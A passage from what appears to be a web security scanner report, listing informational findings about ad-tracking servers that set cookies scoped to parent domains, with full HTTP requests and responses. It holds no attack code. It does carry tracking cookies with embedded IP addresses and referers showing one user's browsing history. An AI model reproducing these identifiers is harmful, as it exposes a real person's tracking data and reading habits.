Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=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; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; 
udm_0=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; rsiPus_pcmJ="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdqU="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:32 GMT

GIF89a.............!.......,...........D..;

9.15. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH;cfp=1;rndc=130495000;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=213;misc=1304950001207 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: adserver.adtech.de
Cookie: CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: JEB2=4DC7F3676E651A260C6EAF39F01058B1;expires=Wed, 8 May 2013 14:7:47 GMT;domain=adtech.de;path=/
Content-Length: 1897

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...

9.16. http://adserver.adtech.de/bind

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /bind

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bind?ckey1=cookiename1;cvalue1=cookievalue1;expiresDays=90;adct=text/html;misc=123&_=1304949672673 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: text/html
Content-Length: 1
Set-Cookie: cookiename1=cookievalue1;expires=Sun, 7 Aug 2011 14:3:53 GMT;domain=adtech.de;path=/


9.17. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1 HTTP/1.1
Host: alvenda.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:50 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|0-0|4DC7F4FA[CE]; Expires=Sat, 7 May 2016 14:06:50 GMT; Domain=.2o7.net; Path=/
Location: http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&pccr=true&&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:50 GMT
Last-Modified: Tue, 10 May 2011 14:06:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www290
Content-Length: 0
Content-Type: text/plain


9.18. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304949586.006,wait-%3E10000,&1304949587809 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_G=method->-1,ts->1304949585; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304949586%2E006%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

9.19. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:45 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949585; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25690

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...

9.20. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2102&rn=699931416&c7=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&c3=16&c4=0&c5=0&c15=541%252C1697%252C2354%252C2532%252C1443%252C2250&c16=LIFL1.FCRT1.ZETC1.AMQU2.NETM7.EXPD1&c8=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 14:00:03 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 14:00:03 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.21. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6036462&d.c=gif&d.o=tribglobal&d.x=64109300&d.t=page&d.u=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 13:59:57 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 13:59:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

9.22. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=256163696&c4=206438267&c5=1&c6=39&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&c9=&c10=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&c15=&1304949586804 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_G=method->-1,ts->1304949585; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 13:59:48 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 08-May-2013 13:59:48 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.23. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530739&ev=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw; 536156_4_101378=1304949601925; vf=1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 14:00:04 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 14:00:04 GMT; Path=/
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:04 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

9.24. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_27583348075&pid=dd81ea27-d6ee-482c-a1ae-66747444994b&s=468x60&f=0.6&cid=oxpv1%3A72-1331-4020-944-2650&hrid=02eea6ce6a94fccf845961f4c7a8855c-1304949600&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; p=1304805364

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=c440f793-2063-4ac9-9371-1aa8ec559ee1; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304949602; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27583348075({"r":null});

9.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=949833763&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|2951880|0|170|AdId=6233986;BnId=1;itime=949833763;key=key1+key2+key3+key4;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
